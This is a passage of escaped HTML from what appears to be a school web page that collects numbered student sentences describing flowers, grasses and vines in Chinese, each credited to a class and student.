serif;\">\u4eba\u8aaa\u541b\u5b50\u5982\u7af9\uff0c\u865b\u5fc3\u5167\u6582\uff0c\u537b\u6c92\u6709\u4eba\u660e\u767d\uff0c\u90a3\u63a9\u85cf\u4e86\u4e09\u5341\u5e74\u7684\u60c5\u610f\uff0c\u4e5f\u66fe\u8086\u610f\u7dbb\u653e\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">27.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u66fc\u73e0\u6c99\u83ef\uff0c\u65e2\u662f\u6b7b\u795e\u7684\u942e\u5200\u4e5f\u662f\u901d\u8005\u7684\u6069\u5178\u3002\u5728\u6f2b\u9577\u95b4\u9ed1\u901a\u5f80\u5e7d\u51a5\u7684\u9ec3\u6cc9\u4e4b\u8def\u4e0a\uff0c\u552f\u6709\u5341\u91cc\u7d05\u84ee\u4e00\u7c07\u7c07\u8c54\u7d05\u7684\u707c\u4eba\u96d9\u76ee\uff0c\u662f\u6591\u6591\u8840\u6dda\u6240\u7a4d\u805a\u800c\u6210\uff0c\u958b\u5728\u907a\u5fd8\u524d\u751f\u7684\u5f7c\u5cb8\u3002\u5b7d\u93e1\u53f0\u524d\uff0c\u4e0d\u898b\u901d\u8005\uff0c\u53ea\u898b\u4e99\u53e4\u4e0d\u8b8a\u7684\u5f7c\u5cb8\u82b1\u3002<span>(<\/span>\u6309<span>:<\/span>\u300c\u5b7d\u93e1\u53f0\u524d\u7121\u597d\u4eba\u300d\uff0c\u5982\u679c\u751f\u524d\u6108\u70ba\u5584\uff0c\u5728\u5b7d\u93e1\u53f0\u662f\u770b\u4e0d\u5230\u81ea\u5df1\u7684\u3002<span>) (<\/span>\u66fc\u73e0\u6c99\u83ef\uff0f\u4e09\u7fa9<span> 06<\/span>\u5433\u74a6\u5982<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">28.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5728\u4e00\u7247\u7fe0\u7da0\u4e2d\uff0c\u6e05\u6f88\u3001\u4e7e\u6de8\u7684\u7d14\u767d\u4e00\u4e32\u4e32\u96a8\u98a8\u8569\u6f3e\uff0c\u5c31\u50cf\u98a8\u9234\u8f15\u97ff\u3002\u5979\u662f\u9234\u862d\u82b1\uff0c\u53c8\u7a31\u98a8\u9234\u8349\uff0c\u4e00\u6735\u6735\u9234\u943a\u822c\u7684\u6f54\u767d\u82b1\u6735\u62db\u5c55\u8457\uff0c\u5f77\u5f7f\u771f\u5f9e\u98a8\u4e2d\u807d\u898b\u6e05\u8106\u7684\u53ee\u5679\u8072\u3002\u5e78\u798f\u56de\u6b78\u6642\uff0c\u6703\u8f15\u8f15\u6416\u97ff\u5979\uff0c\u5979\u662f\u5e36\u4f86\u5e78\u798f\u7684\u9234\uff0c\u662f\u60f3\u8d77\u5e78\u798f\u7684\u8072\u3002<span>(<\/span>\u6309\uff1a\u9234\u862d\u82b1\u8a9e\u70ba\u300c\u5e78\u798f\u56de\u6b78\u6642\u300d\u3002<span>)<\/span>\uff08\u9234\u862d\uff0f\u4e09\u7fa9<span>39<\/span>\u937e\u4f91\u6b23\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">29.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e03\u91cc\u9999\u7d20\u767d\u7684\u5c0f\u82b1\uff0c\u628a\u53cb\u8abc\u7684\u5929\u7a7a\u9ede\u7db4\u5f97\u5982\u6b64\u71e6\u4eae\uff0c\u52dd\u904e\u4efb\u4f55\u4e00\u591c\u7684\u665a\u7a7a\u3002\u6e05\u6de1\u7684\u82b1\u9999\u628a\u53cb\u8abc\u91ba\u5f97\u6696\u70d8\u70d8\uff0c\u58a8\u7da0\u7684\u8449\u628a\u53cb\u60c5\u64e6\u5f97\u6676\u7469\u5254\u900f\u3002\u6211\u6c38\u9060\u8a18\u5f97\u516c\u5712\u570d\u7c6c\u908a\u90a3\u6392\u4e03\u91cc\u9999\uff0c\u50cf\u4e00\u5835\u7121\u5805\u4e0d\u6467\u7684\u57ce\u7246\uff0c\u5b88\u8b77\u7ae5\u5e74\u7684\u6b61\u6a02\uff0c\u6e05\u9999\u662f\u4e00\u5f35\u7db2\uff0c\u88f9\u8457\u6fc3\u6fc3\u7684\u53cb\u8abc\u3002\uff08\u4e03\u91cc\u9999\uff0f\u4e09\u7fa9<span>21<\/span>\u9673\u8283\u96c5\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">30.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6b89\u60c5\u7684\u9bae\u8840\uff0c\u542b\u6068\u5728\u4e00\u53e2\u7a92\u4eba\u7684\u82b3\u99a8\uff0c\u5a9a\u60d1\u4f3c\u5730\u7e7e\u7da3\u8457\u74e3\u74e3\u6b32\u7dbb\u7684\u5ae3\u7d05\u3002\u6416\u66f3\u5728\u67d4\u98a8\u4e2d\uff0c\u717d\u52d5\u8457\u662f\u6bcf\u4e00\u6f6d\u9ed1\u7738\u4e2d\u6700\u7dba\u9e97\u7684\u9050\u601d\u3002\u6487\u5634\u51b7\u7b11\uff0c\u7fe0\u8396\u4e0a\u7684\u92d2\u5203\u523a\u4e0a\u7684\u662f\u524d\u4e16\u672a\u511f\u7684\u5831\u5fa9\u2026\u2026\u8b93\u7d1b\u98db\u8d64\u7d05\u523b\u70d9\u4e0b\u5147\u624b\u7684\u82b3\u540d\u2014\u2014\u73ab\u7470\u3002\uff08\u73ab\u7470\uff0f\u4e09\u7fa9<span>36<\/span>\u5f90\u745c\u82f9\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">31.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5fae\u9ec3\u7684\u82b1\u6735\uff0c\u4e00\u74e3\u74e3\u5728\u6668\u9732\u4e2d\u8212\u5c55\u51fa\u539f\u672c\u5bb3\u7f9e\u906e\u63a9\u7684\u6f54\u767d\uff0c\u4e00\u6735\u6735\u660e\u5a9a\u6e05\u79c0\uff0c\u800c\u8396\u8449\u4e0a\u5713\u6f64\u7684\u671d\u9732\u5fae\u5fae\u5e36\u8457\u65e5\u51fa\u7684\u91d1\u8292\u3002\u6211\u8f15\u8f15\u4e00\u4f4e\u982d\uff0c\u4fbf\u805e\u5230\u90a3\u80a1\u6e05\u9038\u7684\u9999\u6c23\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u676d\u767d\u83ca\uff0f\u4e09\u516c\u3000\u5510\u660e\u79c0<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">32.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5982\u540c\u7aef\u5750\u5728\u6c34\u4e2d\u7684\u8b2b\u4ed9\uff0c\u5728\u6708\u5149\u4e0b\u986f\u5f97\u6709\u4e9b\u6291\u9b31\u84bc\u767d\uff0c\u8f15\u8f15\u51b7\u51b7\u5730\uff0c\u5c0d\u8457\u661f\u7a7a\u8212\u5c55\u8eab\u59ff\uff0c\u597d\u4f3c\u4e00\u4eba\u7368\u5750\u5e7d\u7bc1\uff0c\u4ef0\u9996\u671b\u6708\u3002\u975c\u975c\u7684\uff0c\u542b\u84c4\u7684\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u767d\u84ee\u82b1\uff0f\u4e09\u516c\u3000\u5510\u660e\u79c0<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">33.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6fc2\u6eaa\u5148\u751f\u8aaa\u4ed6\u662f\u53ef\u9060\u89c0\u800c\u4e0d\u53ef\u893b\u73a9\u7684\u541b\u5b50\uff0c\u4f46\u4ed6\u537b\u80fd\u548c\u6d63\u7d17\u7684\u5973\u5b69\u5011\u5b09\u6232\uff0c\u540c\u6f01\u821f\u4e00\u8d77\u6ce2\u52d5\u3002<span>(<\/span>\u84ee\u82b1\uff0f\u4e09\u516c\u3000\u8b1d\u627f\u541b<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">34.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u96a8\u8457\u679d\u689d\u5f80\u4e0a\u722c\uff0c\u4e00\u652f\u4e00\u652f\u5587\u53ed\u9cf4\u594f\u8457\u6625\u5929\u7684\u6a02\u7ae0\uff0c\u6709\u7d2b\u6709\u85cd\u6709\u7d2b\u7d05\uff0c\u597d\u4e00\u500b\u8277\u9e97\u7684\u5c0f\u5587\u53ed\u5718\u3002<span>(<\/span>\u727d\u725b\u82b1\uff0f\u4e09\u516c\u3000\u5433\u73ab\u831c<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">35.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7b4b\u7626\u6709\u9aa8\u7684\u50b2\u6c23\u5728\u51dc\u51bd\u5bd2\u98a8\u4e2d\u7dbb\u653e\u3002\u6108\u51b7\uff0c\u6108\u9999\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6885\u82b1\uff0f\u4e09\u516c <\/span><span class=\"apple-converted-space\"><span style=\"font-size: 11pt; color: #404040;\">\u00a0<\/span><\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif; color: #404040;\">\u8521\u4f73\u84c9<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">36.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u73ab\u7470\u662f\u4ee5\u591c\u9daf\u4e4b\u8840\uff0c\u53ec\u559a\u51fa\u7684\u4e00\u62b9\u5b0c\u8277\u3002\u7576\u7b2c\u4e00\u8072\u9ad8\u97f3\u62d4\u8d77\uff0c\u5979\u602f\u602f\u5730\u62bd\u82bd\u3002\u84bc\u767d\u8edf\u5f31\u7684\u82b1\u74e3\uff0c\u6c72\u53d6\u679d\u982d\u6dcc\u4e0b\u7684\u9bae\u71b1\u751f\u547d\uff0c\u9010\u6f38\u6eab\u6696\u7d05\u6f64\u3002\u7dbb\u653e\u3001\u518d\u7dbb\u653e\uff0c\u986b\u5dcd\u5dcd\u5730\uff0c\u5979\u596e\u529b\u5c07\u6bcf\u7247\u74e3\u5c16\u4f38\u5411\u6e34\u671b\u611b\u60c5\u7684\u7537\u5b69\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5178\u6545\uff1a\u738b\u723e\u5fb7\u300a\u591c\u9daf\u8207\u73ab\u7470\u300b<\/span><span style=\"font-size: 11pt;\">) (<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7d05\u73ab\u7470\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">37<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u937e\u6600\u5bb9<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">37.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5979\u662f\u5927\u81ea\u7136\u7684\u821e\u4f36\uff0c\u6b3e\u64fa\u7684\u88d9\u88fe\u4e00\u5982\u84bc\u7a79\u7684\u842c\u8b8a\uff0c\u96f2\u7684\u6f54\u767d\uff0c\u7a7a\u7684\u6c34\u85cd\u53ca\u591c\u7684\u975b\u7d2b\uff0c\u985b\u5728\u7fe0\u7da0\u7684\u528d\u5c16\u4e0a\uff0c\u5f62\u6210\u4e00\u7a2e\u903c\u8996\u7684\u552f\u7f8e\u3002\u7d2b\u8863\u7684\u821e\u8005\u5728\u8170\u9593\u7e6b\u4e0a\u4e00\u62b9\u5c0d\u6bd4\u7684\u9bae\u9ec3\uff0c\u5728\u85b0\u98a8\u7684\u5f15\u9818\u4e0b\uff0c\u821e\u88d9\u7dbb\u6210\u6735\u6735\u8277\u9e97\u7684\u9cf6\u5c3e\u82b1\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9cf6\u5c3e\u82b1\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">27<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9673\u662d\u9091<\/span><span style=\"font-size: 11pt;\">)<\/span><span style=\"line-height: 22pt; text-indent: -15.4pt;\">\u00a0<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">38.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u67d4\u67d4\u7d30\u7d30\u7684\u5c0f\u82b1\u74e3\u5728\u7da0\u8449\u53e2\u4e2d\u82e5\u96b1\u82e5\u73fe\uff0c\u5e7d\u5e7d\u7684\u6e05\u9999\u8a98\u4eba\u4f47\u8db3\uff0c\u4eca\u79cb\u7684\u98a8\u88e1\uff0c\u4f60\u5316\u8eab\u6de1\u9ec3\u7684\u661f\u5149\u6389\u9032\u738b\u7dad\u9ce5\u9cf4\u6f97\u88e1\u7e7d\u7d1b\u7684\u5922\u3002\uff08\u6842\u82b1\uff0f\u4e09\u6bc5\u3000\u8521\u5b9b\u5ef7\uff09<\/span><span style=\"line-height: 22pt; text-indent: -15.4pt;\">\u00a0<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">39.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6fc3\u9e97\u7684\u7d2b\u7d05\u6e32\u67d3\u4e86\u6574\u689d\u9053\u8def\uff0c\u5947\u5e7b\u3001\u4ee4\u4eba\u76ee\u7729\uff0c\u5728\u5fae\u71b9\u7684\u6668\u5149\u4e2d\u6602\u7136\u633a\u7acb\uff0c\u8277\u7d2b\u834a\u9a5a\u4e16\u99ed\u4fd7\u7684\u7f8e\u5982\u6392\u5c71\u5012\u6d77\u885d\u64ca\u6574\u5ea7\u57ce\u5e02\uff0c\u4f7f\u4eba\u5011\u5728\u72c2\u653e\u7684\u7d2b\u7d05\u4e2d\u5fae\u91ba\u3002<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<hr class=\"system-pagebreak\" title=\"\u690d\u7269\u7684\u63cf\u5beb\uff1a\u8349\" \/>\n<p>&nbsp;<\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 57pt; text-indent: -21pt; line-height: 22pt;\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif; color: #c00000;\">\u8349<\/span><\/b><b><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">1.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5f37\u70c8\u800c\u6e05\u65b0\u7684\u6c23\u5473\u7ac4\u5165\u9f3b\u8154\uff0c\u5e73\u8eba\u5728\u6eab\u6696\u6ebc\u6f64\u7684\u571f\u58e4\u4e0a\uff0c\u6cb9\u7da0\u5805\u97cc\u7684\u5c0f\u8349\u523a\u523a\u7662\u7662\u7684\u6469\u5a11\u8457\u6211\u7684\u9762\u9830\uff0c\u590f\u98a8\u62c2\u904e\uff0c\u300c\u6c99\u6c99\u6c99\u6c99\u6c99\u300d\uff0c\u6574\u500b\u5c71\u982d\u5b89\u975c\u7684\u53ea\u5269\u4e0b\u6211\u8207\u5c0f\u8349\u7684\u6eab\u67d4\u5c0d\u8a71\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">2.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8737\u66f2\u6210\u5996\u7570\u5f62\u72c0\u7684\u7da0\u8272\u7fbd\u6bdb\u4e0a\uff0c\u6839\u6839\u5206\u660e\uff0c\u77ed\u77ed\u4e73\u767d\u8272\u7d68\u6bdb\u8086\u7121\u5fcc\u619a\u7684\u751f\u9577\u8457\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">3.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8349\u7da0\uff0c\u5af0\u7da0\uff0c\u7fe0\u7da0\uff0c\u4e0d\u540c\u9762\u76f8\u6709\u4e0d\u540c\u98fd\u548c\u5ea6\uff0c\u5728\u8349\u5730\u4e0a\u6392\u958b\u594f\u6210\u548c\u8ae7\u7684\u7bc7\u7ae0\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">4.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u671b\u7121\u969b\u7684\u7da0\u8335\u5728\u5b89\u4efd\u5b88\u62d9\u4e2d\u5e36\u8457\u53e4\u6a38\u7684\u6eab\u67d4\uff0c\u537b\u5728\u88ab\u8e10\u8e0f\u7684\u524e\u90a3\uff0c\u96b1\u96b1\u900f\u8457\u4e0d\u5c48\u7684\u97cc\u6027\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">5.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8349\u5c16\u6668\u9732\u9ed8\u9ed8\u5730\u6fe1\u6ebc\u4e86\u978b\u5e95\uff0c\u50cf\u662f\u5979\u7121\u8072\u7684\u773c\u6dda\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">6.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6eff\u5730\u84bc\u7fe0\uff0c\u5f77\u5f7f\u7121\u9650\u96e2\u60c5\uff0c\u7531\u5e73\u856a\u76e1\u8655\u8513\u5ef6\u81f3\u5929\u6daf\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">7.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u530d\u5310\u5728\u50be\u9839\u7684\u7246\u57a3\uff0c\u4ee5\u4e00\u8eab\u6676\u7469\u7684\u7da0\u74b0\u8b77\u8457\u88ab\u6f20\u8996\u7684\u8ec0\u6bbc\u3002\u300c\u662f\u4f60\u55ce\uff1f\u66fe\u66ff\u6211\u963b\u64cb\u4e86\u98a8\u96e8\u3002\u300d<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">8.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5c0f\u6cb3\u908a\u8606\u8466\u84bc\u84bc\uff0c\u96a8\u98a8\u5a46\u5a11\u8d77\u821e\uff0c\u8eab\u4e0a\u6bdb\u7d68\u7d68\u6de1\u8910\u8272\u7684\u7fbd\u7d17\uff0c\u662f\u6700\u8f15\u76c8\u7684\u821e\u886b\uff0c\u4e5f\u6700\u5f15\u4eba\u9050\u601d\u3002<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">9.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6709\u4eba\u8aaa\u6211\u662f\u58d3\u6b7b\u99f1\u99dd\u7684\u7f6a\u9b41\u798d\u9996\uff0c\u7136\u800c\u7576\u706b\u7d05\u7099\u71b1\u7684\u592a\u967d\u70d9\u5728\u6211\u8d64\u88f8\u7684\u80f4\u9ad4\u4e0a\uff0c\u662f\u8ab0\u5728\u70ba\u4f60\u5011\u72a7\u7272\uff1f<span>(<\/span>\u8349\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">10.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7d30\u9577\u5f4e\u66f2\u7684\u85e4\u8513\u7e8f\u7e5e\u6574\u68f5\u6a39\uff0c\u9752\u7da0\u8272\u7684\u89f8\u624b\u4e00\u96bb\u96bb\u7dca\u7dca\u627c\u4f4f\u4e3b\u5e79\uff0c\u9644\u751f\u8449\u7247\u722d\u5148\u6050\u5f8c\u5730\u958b\u5c55\uff0c\u5f77\u5f7f\u8981\u8986\u84cb\u4ea1\u8005\u4e4b\u8ec0\u3002\u4e00\u68f5\u6a39\u5728\u6fc3\u7684\u4ee4\u4eba\u7a92\u606f\u7684\u7da0\u610f\u4e2d\u6b7b\u53bb\u3002<span>(<\/span>\u85e4\u8513\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">11.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u90a3\u7a97\u53f0\u7e7e\u7da3\u7684\u7da0\u85e4\u8513\uff0c\u4e00\u53e2\u53e2\uff0c\u4f3c\u6211\u8166\u4e2d\u5343\u7d72\u842c\u7e37\u7684\u601d\u7dd2\uff0c\u60f3\u5c07\u5176\u68b3\u7406\u4e26\u4fee\u526a\uff0c\u537b\u5982\u7206\u70b8\u822c\uff0c\u5230\u8655\u8513\u5ef6\uff0c\u300c\u6cbb\u7d72\u6108\u68fc\u300d\u3002<span>(<\/span>\u85e4\u8513\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">12.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6cbf\u8457\u7a97\u53f0\uff0c\u4e0d\u65b7\u7684\u5f80\u4e0a\u722c\uff0c\u50cf\u500b\u5014\u5f37\u7684\u5b69\u5b50\uff0c\u9ad8\u9084\u8981\u518d\u9ad8\uff0c\u6c38\u4e0d\u653e\u68c4\u7684\u5411\u524d\u4f38\u9577\u4ed6\u7684\u96d9\u624b\u3002<span>(<\/span>\u85e4\u8513\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">13.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7a97\u5916\u7684\u8461\u8404\u85e4\uff0c\u530d\u5310\u5728\u77f3\u780c\u7684\u7246\u4e0a\uff0c\u5fae\u51b7\u7684\u6e05\u6668\uff0c\u967d\u5149\u7051\u843d\u5728\u6df1\u7da0\u7684\u8449\u4e0a\uff0c\u8449\u4e0a\u7684\u521d\u9732\uff0c\u9583\u8457\u9ede\u9ede\u4eae\u5149\u3002<span>(<\/span>\u85e4\u8513\uff0f\u4e09\u5b5d\u6578<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">14.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u53e2\u4e0a\u4e86\u91c9\u7684\u9752\u7fe0\uff0c\u7d30\u7626\u800c\u8f15\u76c8\uff0c\u67d4\u8edf\u800c\u5a40\u5a1c\u3002\u90a3\u6de1\u96c5\u7684\u82ac\u82b3\u4e0d\u662f\u4f86\u81ea\u5b0c\u8cb4\u9bae\u8277\u7684\u82b1\u6735\uff0c\u800c\u662f\u4f86\u81ea\u6a38\u5be6\u6e05\u65b0\u7684\u6ab8\u6aac\u8349\uff0c\u7528\u5979\u6416\u66f3\u7684\u59ff\u614b\uff0c\u50be\u8a34\u8457\u8aaa\u4e0d\u51fa\u53e3\u7684\u611b\u3002\uff08\u6ab8\u6aac\u8349\uff0f\u4e09\u7fa9\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">15.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u59b3\u662f\u90a3\u679d\u982d\u4e0a\u7684\u7d05\u8277\uff0c\u547d\u88e1\u5e36\u8457\u300c\u4e5d\u91cd\u300d\u537b\u4e0d\u5c6c\u65bc\u90a3\u79cb\u3002\u5728\u7be9\u4e0b\u7684\u91d1\u5149\u4e2d\u63da\u9996\uff0c\u9a55\u50b2\u7684\u8000\u793a\u4f60\u61fe\u4eba\u7684\u5af5\u5a9a\u3002\u4f46\u7d42\u7a76\u7121\u60c5\u7684\u98a8\u96e8\u904e\u5f8c\uff0c\u59b3\u53ea\u80fd\u6b98\u6557\u7684\u8eba\u843d\u5728\u5730\uff0c\u8863\u4e0d\u853d\u9ad4\u7684\u615a\u7f9e\uff0c\u53ef\u662f\u53ea\u6709\u6211\u77e5\u9053\uff0c\u59b3\u892a\u4e0b\u5f69\u886b\u5f8c\uff0c\u4f9d\u820a\u662f\u4e00\u4f4d\u7dba\u9e97\u4f73\u4eba\u3002\uff08\u4e5d\u91cd\u845b\uff0f\u4e09\u7fa9<span>13<\/span>\u6797\u66f8\u7dba\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">16.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, 